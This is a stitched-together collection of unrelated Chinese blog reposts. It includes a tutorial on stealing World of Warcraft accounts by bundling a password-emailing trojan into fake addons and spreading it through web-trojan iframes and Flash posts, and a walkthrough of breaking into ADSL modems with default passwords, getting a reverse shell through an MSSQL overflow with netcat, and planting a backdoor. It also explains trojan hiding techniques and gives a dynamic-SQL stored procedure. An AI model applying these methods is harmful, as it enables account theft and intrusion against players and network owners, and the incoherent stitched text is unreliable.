魔兽世界6月份开始登陆中国网络游戏市场,在很短的时间内就占据了国内网游市场,在国内形成了一股魔兽世界风暴。在这款网游流行的背后却有一只黑手慢慢的伸向他,魔兽世界最终也和其他网游一样没有逃脱盗号的恶运。到目前为止,魔兽世界的盗号事件已经是层出不穷,这里我就带大家一起来揭开魔兽世界的盗号之迷,同时本文中笔者也将给大家介绍相应的防范技巧。

  黑客如何窃取魔兽世界帐号

  首先盗号者需要准备魔兽世界木马一只,这是最基本的了,所有帐号密码都是有他来盗取了。魔兽世界木马种类也有很多种,有公开的也有没公开的,公开的魔兽世界木马在各大黑客网站都有下载,这里我推荐天龙工作室开发的魔兽世界木马,界面如下:

p1.jpg

图一

  其中邮件地址处填的就是我们接收帐号密码的邮件地址,下面几项就是邮件服务器设置项,右边就是用来发送帐号密码的邮箱地址,用户名密码,全部设置完后点击生成程序生成木马服务端。

  接下来就是最重要的环节了,如何让对方不知不觉中中的你木马了,这里将给大家讲解两种利用方式。第一种是捆绑法,为了使中魔兽世界木马的大部分都是魔兽世界玩家,我们可以这个木马捆绑在魔兽世界插件上,然后向外界发布你这个捆绑了木马的插件说是最新插件,这样一定会有不少玩家依靠baidu和google找到你向各大网站发布的这个被动了手脚的插件了,这样玩家就会在体验插件的同时毫无知觉的中魔兽世界木马。至于如何捆绑木马到其他程序上,这里可以用到一些专门的文件合并工具,这里我们选用水晶情缘开发的“EXE文件合并粉碎机”进行文件合并,软件界面如下:

p2.jpg

图二

把2个程序选择进去,然后提取正常程序的图标点击开始合并即可完成捆绑工作,接下来你就可以把捆绑好木马的程序到各大软件下载网站发布了,加点迷惑信息,就声称是最新的魔兽世界插件,这样就会有大量的玩家来下载插件用了,当然也在悄然无息中运行你的魔兽世界木马了。曾经在前一段时间,大脚(bigfoot)合作站点NGACN已经发布公告承认大脚被种入木马的事实,但大脚(bigfoot)官方站http://www.wowinside.net对此事只字未提,而月光宝盒(17cube)至今为止没有对此事做出任何说明和道歉。让人不得对这两大插件提供商感到遗憾,一方面不遗余力的推广自己的插件获取用户。一方面却不能保障插件的安全性。甚至在出现如此严重的盗号事件后也仅仅是一笔带过。完全没意识到事件的严重性。据悉,国内三大整合插件大脚和月光宝盒以及这次幸免于难的魔兽精灵(WoWshell)使用用户加起来超过150万用户,一旦客户端被种入木马,后果不堪设想。此次事件也暴露出国内整合插件提供商安全性完全没有保障的事实。Bigfoot,17cube,WoWshell等整合插件提供商都属于个人网站,其存放插件下载的服务器都属于租用的服务器,安全防范意识相对较差。一旦被黑,使用这些整合插件的用户更新插件就可能被种上木马,造成大规模的帐号被盗。在这次提供插件下载的官方网站服务器被黑,到致使一部分玩家帐号不翼而飞,整个过程就是盗号者对捆绑插件的利用,当然他们的捆绑方法要远远高于上面介绍的捆绑方法。

  第二种方法就是利用网页木马来传播你的魔兽世界木马了,这样你需要一个个人的网页空间,网站提供各种与魔兽世界相关的软件动画下载,不过我们在网站首页加上一句的代码,这样别人在浏览你的网页的同时也就悄然无息的中了你配置好的木马了。如果你有一定的黑客技术的话,就可以黑掉一些第三方的魔兽世界交易网站在他首页上加上这么一句,那么魔兽帐号就会源源不断的跑到你的邮箱里来。就算你没有一定的黑客技术的话也不要紧,找一些和魔兽世界有关的游戏论坛,因为到目前为止所有的论坛都有一个通性,就是允许用户在论坛贴flash动画,这样也就无形中给木马提供了藏身的温床,我们可以制作一个特殊的flash张贴到各大魔兽世界讨论论坛,其flash的制作方法也很简单,先到网上下载一个十分火热的flash动画,然后在本地对下载回来的flash进行编辑,接下来打开flash制作工具,选择文件菜单下的导入到库选项把刚下载下来后缀为swf的flash文件导入到库中,接下来选择窗口菜单下的库选项打开库面板,再双击刚导入进来的swf的影片剪辑进入编辑状态,接下来再选择时间轴上的第一祯,再点击场景下面的动作面板将动作面板展开,如下图所示:

p3.jpg

图三

  再选择动作面板下的浏览器网络下的getURL,然后我们在右侧的URL文本框中写下我们的木马网页,这时时间轴的第一祯上就会出现一个符号,这就说明我们的动作脚本添加好了,影片剪辑编辑好了,我们再把这个影片剪辑拖到主场景中,重新生成一个flash即可。把生成的flash上传到你的空间,最后就是到各大论坛上去张贴你的flash了,这样当别人浏览你发的帖时就会自动访问你的木马网页了,这样也就自动执行了你做好的木马了。至于前面所说的网页木马制作,我们可以使用动鲨网页木马生成器,其界面如下:

p4.jpg

图四

首先把你前面配置好的魔兽世界木马的服务端上传到你空间,并记下他的地址,然后在图三中的最下面文本框输入你的木马地址,再点击生成网页木马就可以傻瓜式的生成网页木马了,把生成的所有文件再上传到你的空间里,最后把iframe里的网页木马地址改成刚生成的网页木马地址即可。

  现在这里我再给大家演示下盗取魔兽世界帐号密码的效果,如下图所示的,魔兽世界登陆界面:

p5.jpg

图五

  其中帐号密码我随便填的,事先我已在这台电脑上种植了魔兽世界木马,我们点击登陆以后,再到我们接收帐号密码的邮箱里去看,我们会发现我们的邮箱里多了这样一封邮件:

p6.jpg

图六

  看见了吧,输入的用户名密码都在里面了,是不是很爽。

经测试,在 14483461 条记录中查询第 100000 页,每页 10 条记录按升序和降序第一次时间均为 0.47 秒,第二次时间均为 0.43 秒,测试语法如下:
 exec GetRecordFromPage news,newsid,10,100000
 news 为 表名, newsid 为关键字段, 使用时请先对 newsid 建立索引。
*/

/*
 函数名称: GetRecordFromPage
 函数功能: 获取指定页的数据
 参数说明: @tblName   包含数据的表名
      @fldName   关键字段名
      @PageSize   每页记录数
      @PageIndex  要获取的页码
      @OrderType  排序类型, 0 – 升序, 1 – 降序
      @strWhere   查询条件 (注意: 不要加 where)
 作  者: 铁拳
 邮  箱: [email protected]
 创建时间: 2004-07-04
 修改时间: 2004-07-04
*/
CREATE PROCEDURE GetRecordFromPage
  @tblName   varchar(255),    — 表名
  @fldName   varchar(255),    — 字段名
  @PageSize   int = 10,      — 页尺寸
  @PageIndex  int = 1,      – 页码
  @OrderType  bit = 0,      – 设置排序类型, 非 0 值则降序
  @strWhere   varchar(2000) = "" – 查询条件 (注意: 不要加 where)
AS

declare @strSQL  varchar(6000)    — 主语句
declare @strTmp  varchar(1000)    — 临时变量
declare @strOrder varchar(500)    – 排序类型

if @OrderType != 0
begin
  set @strTmp = "<(select min"
  set @strOrder = " order by [" + @fldName + "] desc"
end
else
begin
  set @strTmp = ">(select max"
  set @strOrder = " order by [" + @fldName +"] asc"
end

set @strSQL = "select top " + str(@PageSize) + " * from ["
  + @tblName + "] where [" + @fldName + "]" + @strTmp + "(["
  + @fldName + "]) from (select top " + str((@PageIndex-1)*@PageSize) + " ["
  + @fldName + "] from [" + @tblName + "]" + @strOrder + ") as tblTmp)"
  + @strOrder

if @strWhere != ""
  set @strSQL = "select top " + str(@PageSize) + " * from ["
    + @tblName + "] where [" + @fldName + "]" + @strTmp + "(["
    + @fldName + "]) from (select top " + str((@PageIndex-1)*@PageSize) + " ["
    + @fldName + "] from [" + @tblName + "] where " + @strWhere + " "
    + @strOrder + ") as tblTmp) and " + @strWhere + " " + @strOrder

if @PageIndex = 1
begin
  set @strTmp = ""
  if @strWhere != ""
    set @strTmp = " where (" + @strWhere + ")"

  set @strSQL = "select top " + str(@PageSize) + " * from ["
    + @tblName + "]" + @strTmp + " " + @strOrder
end

exec (@strSQL)

GO

  1991年8月,美国正式将互联网技术由军用转为民用,由此引发了全球互联网热潮,人类生活开始了天翻地覆的变化。本周出版的英国《观察家报》列出了在这15年里改变世界的15个网站。

  1 www.eBay.com(电子港湾)
 
  创建:皮埃尔·奥米迪亚,1995年,美国

  用户:1.68亿

  关键词:在线拍卖和购物

  除了枪支弹药以外,你几乎可以在这里买到任何想买的东西。许多人甚至放弃了原有的工作,转而选择在这个网上大卖场开店创业。

  2 www.wikipedia.com(维基百科)

  创建:吉米·威尔士,2001年,美国

  用户:每天91.2万人次访问

  关键词:免费百科全书

  这本百科全书有个与众不同之处:它向所有网民开放,每个人既是读者,又是编辑。你可以任意创建或者改编一个条目,所需要做的只是点击、打字、提交,然后刷新。

  3 www.napster.com(纳帕斯特)

  创建:肖恩·范宁,1999年,美国

  用户:50万个付费用户

  关键词:音乐共享

  网站最初提供的是免费音乐下载,在2000年注册用户就超过了7000万。但随之而来的全球五大唱片公司联名控告它侵犯版权的官司,使得它无奈变身为收费下载网站。

  4 www.youtube.com

  创建:扎德·赫尔利、史蒂夫·陈和乔德·卡瑞姆,2005年,美国

  用户:每天1亿人次视频浏览

  关键词:视频共享

  一开始人们把自己拍的家庭录像放到网站上和朋友分享,后来越来越多的人开始上传自己珍藏的影视作品,有些人甚至因此得到了知名电影公司的青睐。

  5 www.blogger.com(博客网)

  创建:埃文·威廉斯,1999年,美国

  用户:1850万固定访客

  关键词:博客

  在发明博客软件的时候,威廉斯只是把它当作一种无聊消遣的玩意,他根本想不到博客成为了本世纪最热门的互联网,并发展成为一种个人媒体。

  6 www.friendsreunited.com(友聚网)

  创建:史蒂夫和朱莉·潘克赫斯特夫妇,1999年,英国

  用户:1500万

  关键词:校友录
  朱莉想知道同学们毕业后散落何方,她的程序员丈夫设计了这个网站。起初每天的点击只有个位数,直到2001年,一家电台介绍了他们的网站,校友录模式很快风靡全球。

  7 www.drudgereport.com(德拉吉报道)

  创建:马特·德拉吉,1994年,美国

  用户:每天800万到1000万页次浏览

  关键词:个人媒体

  1998年,德拉吉在个人网站上独家爆出克林顿的“拉链门”事件,并在此后半年内引导着美国舆论走向,从此,数以百万计的网民养成了上德拉吉网站看新闻的习惯。

  8 www.myspace.com(我的空间)

  创建:汤姆·安德森、克里斯·迪沃尔夫,2003年,美国

  用户:1亿

  关键词:社交网络

  “我的空间”打造网民的网上家园,它集合了网络社区的全部功能,增加了分类广告和记事安排,这使得它的日访问量高居全球第四。

  9 www.amazon.com(亚马逊书店)

  创建:杰弗·比索斯,1994年,美国

  用户:超过250个国家和地区3500多万用户

  关键词:网上书店

  说起亚马逊,15年前,人们想到的是世界第一大河;15年后,人们更多想到的是世界第一大书店。作为全球电子商务的代表,比索斯在1999年成为美国《时代》杂志“年度风云人物”。

  10 www.slashdot.org

  创建:罗伯·马尔达,1997年,美国

  用户:每月5500万

  关键词:科技论坛

  马尔达被美国《时代》杂志评为世界百强创新家之一,他的网站也成为全球访问量最大的网站之一,他最大的发明是开创了网民自行编写网页文字内容的先例,引来谷歌、维基百科等网站纷纷效仿。

  11 www.salon.com(沙龙网)

  创建:大卫·塔尔博特,1995年,美国

  用户:每月2500万至3500万访客

  关键词:在线杂志

  1994年,塔尔博特所供职的报纸罢工,他和一些同事试着办起了网上报纸。尝到甜头以后,塔尔博特索性辞去报纸美编职务,专心做起了网上媒体。

  12 www.craigslist.org(克雷格列表)

  创建:克雷格·纽马克,1995年,美国

  用户:每月4万亿页次浏览

  关键词:分类广告

  网站页面简单到近乎丑陋的地步,只是一块密密麻麻贴满各种小字条的公告牌。然而千万不要小看它,这可是全球最早也是最大的免费分类广告网站。

  13 www.google.com(谷歌)

  创建:拉里·佩吉、赛吉·布林,1998年,美国

  用户:每天10亿个搜索请求

  关键词:搜索引擎

  “google”如今在牛津英语字典里不仅是名词,而且是动词。以搜索引擎起家的google正在发展成为庞大的网络帝国:邮件、新闻、聊天等工具不一而足。

  14 www.yahoo.com(雅虎)

  创建:大卫·菲勒、杨致远,1994年,美国

  用户:4亿

  关键词:门户网站

  yahoo大概是最早被世人所知的网络神话之一,它曾创下平均每天网页点击数34万亿的纪录,它的门户网站模式在互联网上被一再克隆。

  15 www.easyjet.com(易航网)

  创建:斯蒂里奥斯·哈吉-艾奥诺,1995年,英国

  用户:去年乘客3000万人次

  关键词:廉价航空

  easyjet利用了互联网这一最为快捷经济的销售渠道,在短短几年里便跻身欧洲大航空公司之列。)

奇客网 http://diglog.com
奇客发现 有趣新鲜

窝窝网 http://www.mywowo.com
用Digg+点评方式来介绍web2.0的网站(国内最全的web2.0收集网站)

新聚网 http://www.tagriver.com
博客时代的新型交流

顶啊网 http://www.dingr.com
关于科技的头版新闻

抓虾网 http://www.zhuaxia.com
集rss订阅和digg挖掘为一体。

比客窝http://www.pkooo.com
以资讯为主的PK新闻

电影发现 http://www.new21.cn
电影发现·分享

爱发现 http://www.ifaxian.com
依靠社区的力量找出网上有阅读价值的内容

新热网 http://www.newhots.com
针对技术,BT资源,娱乐的网摘网站

教育资源挖掘 http://www.edudig.net
发掘互联网上有价值的教育资源

17DIG网 http://www.17dig.com
发掘IT新闻,草根们的新闻

中国掘客 http://www.cndigg.com
完全是digg.com的中文版

  一、扫描

  现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。

  二、映射

  入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项—添加NAT规则—BAMID—填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们访问ADSL MODEM就等于访问主机192.168.1.2了

  三、检测漏洞

  现在我们再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊

  四、溢出

  既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行

  五、募然回首,那人却在,灯火阑珊处

  看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是

  nc -v -l 99

  sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

  bingle 成功地得到一个shell了

  六、设置后门

  到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。

    以前,我曾认为只要不随便运行网友发来的文件就不会中病毒或木马,但后来出现了利用漏洞传播的冲击波、震荡波;以前,我曾认为不上小网站就不会中网页木马,但后来包括国内某知名游戏网站在内的多个大网站均在其首页被黑客挂上了木马。从此,我知道:安全,从来没有绝对的。

  虽然没有绝对的安全,但如果能知已知彼,了解木马的隐藏手段,对于木马即使不能百战百胜,也能做到及时发现,使损失最小化。那么,木马究竟是如何躲在我们的系统中的呢?

  最基本的隐藏:不可见窗体+隐藏文件

  木马程序无论如何神秘,但归根究底,仍是Win32平台下的一种程序。Windows下常见的程序有两种:

  1.Win32应用程序(Win32 Application),比如QQ、Office等都属于此行列。

  2.Win32控制台程序(Win32 Console),比如硬盘引导修复程序FixMBR。

  其中,Win32应用程序通常会有应用程序界面,比如系统中自带的“计算器”就有提供各种数字按钮的应用程序界面。木马虽然属于Win32应用程序,但其一般不包含窗体或隐藏了窗体(但也有某些特殊情况,如木马使用者与被害者聊天的窗口),并且将木马文件属性设置为“隐藏”,这就是最基本的隐藏手段,稍有经验的用户只需打开“任务管理器”,并且将“文件夹选项”中的“显示所有文件”勾选即可轻松找出木马(见图1),于是便出现了下面要介绍的“进程隐藏”技术。

  第一代进程隐藏技术:Windows 98的后门

  在Windows 98中,微软提供了一种能将进程注册为服务进程的方法。尽管微软没有公开提供这种方法的技术实现细节(因为Windows的后续版本中没有提供这个机制),但仍有高手发现了这个秘密,这种技术称为RegisterServiceProcess。只要利用此方法,任何程序的进程都能将自己注册为服务进程,而服务进程在Windows 98中的任务管理器中恰巧又是不显示的,所以便被木马程序钻了空子。

  要对付这种隐藏的木马还算简单,只需使用其他第三方进程管理工具即可找到其所在,并且采用此技术进行隐藏的木马在Windows 2000/XP(因为不支持这种隐藏方法)中就得现形!中止该进程后将木马文件删除即可。可是接下来的第二代进程隐藏技术,就没有这么简单对付了。

  第二代进程隐藏技术:进程插入

  在Windows中,每个进程都有自己的私有内存地址空间,当使用指针(一种访问内存的机制)访问内存时,一个进程无法访问另一个进程的内存地址空间,就好比在未经邻居同意的情况下,你无法进入邻居家吃饭一样。比如QQ在内存中存放了一张图片的数据,而MSN则无法通过直接读取内存的方式来获得该图片的数据。这样做同时也保证了程序的稳定性,如果你的进程存在一个错误,改写了一个随机地址上的内存,这个错误不会影响另一个进程使用的内存。

  你知道吗——进程(Process)是什么

  对应用程序来说,进程就像一个大容器。在应用程序被运行后,就相当于将应用程序装进容器里了,你可以往容器里加其他东西(如:应用程序在运行时所需的变量数据、需要引用的DLL文件等),当应用程序被运行两次时,容器里的东西并不会被倒掉,系统会找一个新的进程容器来容纳它。

  一个进程可以包含若干线程(Thread),线程可以帮助应用程序同时做几件事(比如一个线程向磁盘写入文件,另一个则接收用户的按键*作并及时做出反应,互相不干扰),在程序被运行后中,系统首先要做的就是为该程序进程建立一个默认线程,然后程序可以根据需要自行添加或删除相关的线程(见图2 进程关系图)。

  1.进程插入是什么

  独立的地址空间对于编程人员和用户来说都是非常有利的。对于编程人员来说,系统更容易捕获随意的内存读取和写入*作。对于用户来说,*作系统将变得更加健壮,因为一个应用程序无法破坏另一个进程或*作系统的运行。当然,*作系统的这个健壮特性是要付出代价的,因为要编写能够与其他进程进行通信,或者能够对其他进程进行*作的应用程序将要困难得多。但仍有很多种方法可以打破进程的界限,访问另一个进程的地址空间,那就是“进程插入”(Process Injection)。一旦木马的DLL插入了另一个进程的地址空间后,就可以对另一个进程为所欲为,比如下文要介绍的盗QQ密码。

  2.木马是如何盗走QQ密码的

  普通情况下,一个应用程序所接收的键盘、鼠标*作,别的应用程序是无权“过问”的。可盗号木马是怎么偷偷记录下我的密码的呢?木马首先将1个DLL文件插入到QQ的进程中并成为QQ进程中的一个线程,这样该木马DLL就赫然成为了QQ的一部分!然后在用户输入密码时,因为此时木马DLL已经进入QQ进程内部,所以也就能够接收到用户传递给QQ的密码键入了,真是“家贼难防”啊!

  (插入图06zcxtrojan0a.tif)

  3.如何插入进程

  (1)使用注册表插入DLL

  早期的进程插入式木马的伎俩,通过修改注册表中的[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindowsAppInit_DLLs]来达到插入进程的目的。缺点是不实时,修改注册表后需要重新启动才能完成进程插入。

  (2)使用挂钩(Hook)插入DLL

  比较高级和隐蔽的方式,通过系统的挂钩机制(即“Hook”,类似于DOS时代的“中断”)来插入进程(一些盗QQ木马、键盘记录木马以Hook方式插入到其他进程中“偷鸡摸狗”),需要调用SetWindowsHookEx函数(也是一个Win32 API函数)。缺点是技术门槛较高,程序调试困难,这种木马的制作者必须具有相当的Win32编程水平。

  你知道吗——什么是API

  Windows中提供各种功能实现的接口称为Win32 API(Application Programming Interface,即“应用程序编程接口”),如一些程序需要对磁盘上的文件进行读写,就要先通过对相应的API(文件读写就要调用文件相关的API)发出调用请求,然后API根据程序在调用其函数时提供的参数(如读写文件就需要同时给出需要读写的文件的文件名及路径)来完成请求实现的功能,最后将调用结果(如写入文件成功,或读取文件失败等)返回给程序(见图3 应用程序、Win32 API、系统的关系图)。

  (3)使用远程线程函数(CreateRemoteThread)插入DLL

  在Windows 2000及以上的系统中提供了这个“远程进程”机制,可以通过一个系统API函数来向另一个进程中创建线程(插入DLL)。缺点很明显,仅支持Windows 2000及以上系统,在国内仍有相当多用户在使用Windows 98,所以采用这种进程插入方式的木马缺乏平台通用性。

  木马将自身作为DLL插入别的进程空间后,用查看进程的方式就无法找出木马的踪迹了,你能看到的仅仅是一些正常程序的进程,但木马却已经偷偷潜入其中了。解决的方法是使用支持“进程模块查看”的进程管理工具(如“Windows优化大师”提供的进程查看),木马的DLL模块就会现形了。

  不要相信自己的眼睛:恐怖的进程“蒸发”

  严格地来讲,这应该算是第2.5代的进程隐藏技术了,可是它却比前几种技术更为可怕得多。这种技术使得木马不必将自己插入到其他进程中,而可以直接消失!

  它通过Hook技术对系统中所有程序的进程检测相关API的调用进行了监控,“任务管理器”之所以能够显示出系统中所有的进程,也是因为其调用了EnumProcesses等进程相关的API函数,进程信息都包含在该函数的返回结果中,由发出调用请求的程序接收返回结果并进行处理(如“任务管理器”在接收到结果后就在进程列表中显示出来)。

  而木马由于事先对该API函数进行了Hook,所以在“任务管理器”(或其他调用了列举进程函数的程序)调用EnumProcesses函数时(此时的API函数充当了“内线”的角色),木马便得到了通知,并且在函数将结果(列出所有进程)返回给程序前,就已将自身的进程信息从返回结果中抹去了。就好比你正在看电视节目,却有人不知不觉中将电视接上了DVD,你在不知不觉中就被欺骗了。

  所以无论是“任务管理器”还是杀毒软件,想对这种木马的进程进行检测都是徒劳的。这种木马目前没有非常有效的查杀手段,只有在其运行前由杀毒软件检测到木马文件并阻止其病毒体的运行。当时还有一种技术是由木马程序将其自身的进程信息从Windows系统用以记录进程信息的“进程链表”中删除,这样进程管理工具就无法从“进程链表”中获得木马的进程信息了。但由于缺乏平台通用性而且在程序运行时有一些问题,所以没有被广泛采用。

  你知道吗——什么是Hook

  Hook是Windows中提供的一种用以替换DOS下“中断”的一种系统机制,中文译名为“挂钩”或“钩子”。在对特定的系统事件(包括上文中的特定API函数的调用事件)进行Hook后,一旦发生已Hook的事件,对该事件进行Hook的程序(如:木马)就会收到系统的通知,这时程序就能在第一时间对该事件做出响应(木马程序便抢在函数返回前对结果进行了修改)。

  毫无踪迹:全方位立体隐藏

  利用刚才介绍的Hook隐藏进程的手段,木马可以轻而易举地实现文件的隐藏,只需将Hook技术应用在文件相关的API函数上即可,这样无论是“资源管理器”还是杀毒软件都无法找出木马所在了。更令人吃惊的是,现在已经有木马(如:灰鸽子)利用该技术实现了文件和进程的隐藏。要防止这种木马最好的手段仍是利用杀毒软件在其运行前进行拦截。

  跟杀毒软件对着干:反杀毒软件外壳

  木马再狡猾,可是一旦被杀毒软件定义了特征码,在运行前就被拦截了。要躲过杀毒软件的追杀,很多木马就被加了壳,相当于给木马穿了件衣服,这样杀毒软件就认不出来了,但有部分杀毒软件会尝试对常用壳进行脱壳,然后再查杀(小样,别以为穿上件马夹我就不认识你了)。除了被动的隐藏外,最近还发现了能够主动和杀毒软件对着干的壳,木马在加了这种壳之后,一旦运行,则外壳先得到程序控制权,由其通过各种手段对系统中安装的杀毒软件进行破坏,最后在确认安全(杀毒软件的保护已被瓦解)后由壳释放包裹在自己“体内”的木马体并执行之。对付这种木马的方法是使用具有脱壳能力的杀毒软件对系统进行保护。

  你知道吗——什么是壳

  顾名思义,你可以很轻易地猜到,这是一种包在外面的东西。没错,壳能够将文件(比如EXE)包住,然后在文件被运行时,首先由壳获得控制权,然后释放并运行包裹着的文件体。很多壳能对自己包住的文件体进行加密,这样就可以防止杀毒软件的查杀。比如原先杀毒软件定义的该木马的特征是“12345”,如果发现某文件中含有这个特征,就认为该文件是木马,而带有加密功能的壳则会对文件体进行加密(如:原先的特征是“12345”,加密后变成了“54321”,这样杀毒软件当然不能靠文件特征进行检查了)。脱壳指的就是将文件外边的壳去除,恢复文件没有加壳前的状态。

1996-2006十年新锐光荣榜

企业: 新浪网 百度 联想中国 腾讯QQ 海南航空
招商银行 《南方都市报》 央视经济频道 SOHO中国
个人: 宁浩 郭德纲 刘翔 黄健翔 刘长乐 胡润 王志纲 徐静蕾 易中天 张艺谋 江南春 周星驰
其他: 动感地带 外滩三号 丽江 超级女声

2005年度新锐榜

新锐人物:李宇春
年度艺人:蔡康永
年度电视剧:《亮剑》
年度电影奖:《孔雀》
年度传媒之年度网站:新浪网新闻频道
年度传媒之年度杂志:《男人装》
年度传媒之年度电视:湖南卫视
年度传媒之年度报纸:《新京报》
年度时尚:韩剧
年度知道分子:王受之
年度图书:《退步集》
飘一代代言人:博客 方兴东
她世纪代言人:超女

2004年度新锐榜

新锐人物:刘翔
企业:顺驰控股
城市秀:三亚“美女秀”
电影:《可可西里》
电视剧:《中国式离婚》
图书:《狼图腾》
艺人:刀郎
知道分子:吴思
论坛:《南方都市报》时评版
时尚:外滩三号
设计:Carlsberg Chill冰纯嘉士伯
广告语:中国移动全球通之“我能”
2004“飘一代”代言人:潘石屹
飘一代代言人:周杰伦
2004“她世纪”代言人:梅婷
优化生活特别贡献奖:窦文涛/旅游卫视/绿A
体育明星:中国女排
年度关键词:大国、新富、宝马、大选、绯闻、马加爵、中超、张艺谋、审计和性小康

2003年度新锐榜

新锐人物:钟南山
企业:盛大网络
传媒:南方报业
图书:万象
电影:无间道
电视节目:有报天天读
电视剧:玉观音
艺人:无间道男人群像
城市:香港
网络风云人物:我为伊狂
设计:可口可乐
时尚:彩信及可拍照手机
她世纪代言人: 粉红女郎

文章来源:《新周刊》

前几天帮朋友修电脑,弄了半天,最后确定是主板出问题了。拿到专门维修主板的地方检测了一下,发现1. 主板电容爆了2个。2.CPU插座松动/虚焊,造成CPU与主板接触不良,导致机器不稳定/开机困难。不过还有更牛的是我下载官方提供的最新BIOS升级以后却发现问题越来越严重了。

这块主板是Soltek的85DR2,Intel 845芯片的。原来的BIOS版本是Ver1.1的。我看官方主页上有2.0的BIOS下载就Down下来升级了。但是升级以后却发现越来越不稳定了,到最后机器直接就无法点亮了。到底是BIOS的问题还是主板本身的问题,我也不想再去弄了。最后刷了Ver1.3的BIOS,就没问题了。

主板拿到电脑医院进行维修,更换了三个1000µf 的电容,重新焊了CPU插座和北桥芯片。CPU插座还好说,但是北桥芯片就比较难搞了。弄了2天时间才把主板弄好。据说是因为北桥芯片是BGA封装的,非常容易就虚焊,所以要多焊几次才能确定成功。

 这是在电脑医院里用手机照的。夸张吧?象这样堆叠主板

图片附件:
image_306.jpg
图片附件:
image_307.jpg
图片附件:
image_308.jpg

帝雉 1/15~2/14出生
条理清晰、见解力强、诚实而坚毅型的人。虽然拥有老实又温和的外表,内心却隐藏着像梅花一般的坚强个性。重视自我实践、有效率地达成目标,你总希望能不断进步以完成更高的理想。你有向上的野心,更会不惜花费时间、金钱,力求完成。

鹰 2/15~3/14出生
早熟善感,富有个性与创意,独特的思维模式让你显得神秘与吸引力。文艺方面具有相当的天份,希望在旅游中找寻人生的真谛与灵魂的意义,流动式的生存方式,也是你向往且擅长的,因此如果硬要把自已绑在一个固定的范围之内,你可能会感到有挫折感,「留在固定模式的框框」里,会埋没了你的才能!

白鸽 3/15~4/14出生
心地善良总是把温暖欢乐带给别人,具有从事公益活动的精神。常常不顾自己,尽力完成别人的托付,要小心被心怀不轨的人利用。不过你却不会因此改变性格,但你却会升华这些教训,变得越来越坚强!

蜂鸟 4/15~5/14出生
个性主观且执着,却是性情中人!不会沉溺于不切实际的空想当中,专心一志达成目标。能适时展现出勇敢果断的一面,口才佳,具谋略且反应快的你,有与生俱来的机智和过人的逻辑力,这样的你不论成为领导人物,还是人气活跃的角色,都会备受注目与拥戴。

画眉鸟 5/14~6/14出生
天生具有神秘感与灵巧的变化性,但时常容易处于矛盾之中。隐藏着两种极端的个性,温柔与强势、可爱与妒嫉、浪费与小气,属于纤细敏感体质。在微笑背后,也有想象不到的超现实的另一面。你适合担任辅臣或谋臣,较能发挥力量。

九官鸟 6/15~7/16出生
具好奇心,聪明且幽默风趣的人。想法一直在改变,虽然辩才无碍,但常不小心把重要的事说溜了嘴。对于耍宝、搞气氛方面也很擅长,人际关系手腕圆滑,如果能不把聪明表现得太过火的话,就能成为人气极旺的阳光人物喔!

文鸟 7/17~8/16出生
容易觉得寂寞,很容易被感动,也很乐意感动别人。虽然很会照顾人,内心却有天真的一面,像彼得潘,是个长不大的顽皮小孩,不过,有时却令人意外地会展现出成熟的一面。

孔雀 8/17~9/16出生
个性鲜明,超喜欢追求流行,永远在找寻自已能引人注目的方式。总是活在想象的世界里。拥有号召人群的能力,可以让大家都聚精会神听你说话;缺点是容易光说不练,若能培养行动力,就有本事让人都愿意跟随你。

七色鸟 9/17~10/16出生
理智型的人,很懂得做事的方法,有时不免对他人的要求也高,如果过于苛求,最后可能会走向孤独,或许是因为带有悲观的性格,所以,你也会常常因为害怕失去,连可以得到的也将之拒绝的情形发生。

乌鸦 10/17~11/16出生
不笑的时候,显得冷酷与淡漠,其实内心隐藏热情,具长辈缘,也会得同辈与晚辈的喜爱与拥戴。不过,因为完美主义的倾向,而考虑太多难以下决定。对于讨厌的人,会毫不保留地加以唾弃,讨厌不公平的事情发生。

金丝雀 11/17~12/14出生
性情中人,容易冲动而行。不过正因为这股隐藏在内心的热诚,让你具有使不可能变成为可能的力量。遇到困难也会超越原本能力。你奉行「一次不忠百次不用」,不会背叛人,也决不原谅背叛的人。

鹦鹉 12/15~1/14出生
自由奔放的乐天派,但因为容易固执的结果,反而导致一些机会与你擦身而过。虽然拥有天份与才气,却过于沉溺在自我傲气中;个性反复无常、兴趣多,也很懂得玩乐,也会有外人意想不到的认真态度!因此要修正一下自己的毛或优柔寡断的个性,才会好相处。

看过用ASCII码所画的电影么?没看过吧?呵呵,非常有创意的一个东西。你在Windows中的运行里面输入 telnet towel.blinkenlights.nl 就可以看到这个ASCII电影了。